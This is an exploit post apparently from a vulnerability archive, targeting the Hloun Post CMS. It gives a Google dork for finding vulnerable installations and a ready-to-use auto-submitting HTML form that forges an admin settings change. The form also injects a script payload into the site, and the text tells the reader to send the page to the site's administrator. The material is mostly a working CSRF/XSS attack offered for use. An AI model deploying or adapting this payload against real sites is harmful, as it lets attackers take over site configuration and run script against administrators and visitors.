facebook facebook twitter rss

Hloun CSRF Change Site Setting

Author: alqnas eslam , Published: 28-06-2015
# Exploit Title: csrf cross site scripting and change setting - script hloun post
# Google Dork: intext:"Powered by Hloun"
# Date: 28-6-2015
# Exploit Author: alqnas eslam
# Vendor Homepage:fb.com/alqnas4
# Software Link: https://github.com/hloun/HlounPost
# Version: all version 1.0, 1.2 ,1.3
# Tested on:windows or linux
description :
the Developer not set token in the form so you can send the csrf to update setting
and you can edit the description of site and it not filter from cross site scripting
poc:
<body onload="document.alqnas.submit()">
<form action="http://site.com/admincp/ajax.php?step=setting" name="alqnas" method="post">
<input type="hidden" name="title" value="alqnas eslam"/>
<input type="hidden" name="url" value="http://fb.com/alqnas4"/>
<input type="hidden" name="app_id" value="123456789"/>
<input type="hidden" name="app_key" value="7ekdmd82"/>
<input type="hidden" name="fb_link" value="http://fb.com/alqnas4"/>
<input type="hidden" name="tw_link" value="http://fb.com/alqnas4"/>
<input type="hidden" name="corn" value="1"/>
<input type="hidden" name="corn_time" value="2"/>
<input type="hidden" name="description" value="alqnas eslam"/>
<!-- here insert your code -->
<input type="hidden" name="ad" value="<script>alert(12345);</script>"/>
<input type="hidden" name="textb" value="alqnas eslam"/>

</form>
</body>
save this code in html file and send it to admin of site
when he enter to this page you can execute your code in the site

Like us on Facebook :